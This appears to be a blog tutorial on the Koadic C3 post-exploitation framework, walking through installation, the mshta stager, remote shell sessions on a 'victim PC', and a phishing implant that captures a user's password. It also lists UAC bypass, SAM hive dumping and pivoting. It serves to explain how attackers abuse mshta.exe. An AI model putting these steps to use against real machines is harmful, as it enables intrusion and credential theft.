Koadic C3 – COM Command & Control
Koadic[ ORIGINALLY DEVELOPED BY ZEROSUM0X0 (https://twitter.com/zerosum0x0)] , or COM Command & Control🤖, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and PowerShell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 1️⃣0️⃣.
It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has enabled).
- Hooks a zombie
- Elevates integrity (UAC Bypass)
- Dumps SAM/SECURITY hive for passwords
- Scans local network for open SMB
- Pivots to another machine
#Installation 📥
While installing this tool make sure you are using root terminal or please use ‘Sudo’ while downloading the repository from git hub.
git clone https://github.com/zerosum0x0/koadic.gitOr 🤷🏻♂️
sudo apt install koadicAfter downloading the tool from GitHub, we have to download the dependencies using the command – 👇🏼
apt-get install python3-pip
pip3 install -r requirements.txt
For execution you just need to type koadic and you’ll be presented with the banner 📺.
We will select Mshta for now! I’ve also used Regsvr but was facing connection timed out issues! You can try out yourself if you want.
We will spawn a stager for ‘Mshta’ for exploit and get shell in our command and control.
Module Description
stager/js/mshta - serves payloads in memory using MSHTA.exe HTML Applications
stager/js/regsvr - serves payloads in memory using regsvr32.exe COM+ scriptlets
stager/js/rundll32_js - serves payloads in memory using rundll32.exe
stager/js/disk - serves payloads using files on disk
stager/js/wmic - serves payloads in memory using WMIC
stager/js/bitsadmin - transfers a .wsf payload containing JScript over a Bitsadmin job and executes itUse command- Use stager/js/mshta
Use command- ‘Info’
To see other options, like we can also use ‘set’ option to set ‘LHOST(Your IP Address), LPORT(Listening Port)’ by which we will get the session.
Now next step, is to set a stager and execute it on the victim PC.
Finally we have our payload. After this now we will have to execute this on the victim PC so that we can have our remote session on the C&C server.
AAYOO! HOLD ON! What is Mshta.exe?🫣
Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.
Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer’s security context, it also bypasses browser security settings.
Now let’s move forward with our payload…We need to execute this payload on the victim PC.
As you can see we got the call back from the payload to our C&C…where it is called zombie 0.
You can also check how many sessions we have currently running on our C&C server by running command ‘Sessions’.
Now moving forward, once we have a stable connection with the victim PC we can directly spawn a Shell into the victim PC and can browse in the file system.
To interact with shell run command ‘cmdshell zombie ID’ here I’ve written 0 as my zombie ID is 0.
We can also use other functions such as phishing dialog box…to be honest it’s not that believable in my opinion but still it will work if the user is noob AF!
For this we need to use ‘Implants’
We will execute- ‘use implant/phish/password_box’
After running this we will get a popup box on the victim PC asking for the password of the current logged in user…
And once the user have entered the password in the popup box
And hit ok button….we will get the same input in our CnC terminal.
Thank you so much if you are reading till here! I hope this helps you understanding how attackers may abuse mshta.exe to proxy execution of malicious .hta files and JavaScript or VBScript through a trusted Windows utility.
Will be taking a short break of 1–2 weeks. I’m traveling to another country for studying my masters…blogs will be back soon! 🫶🏻 Thank you so much and if you want to reach me out here is my Twitter account you can ping me anytime till then peace out ✌🏻❤️🤜🏻🤛🏻.
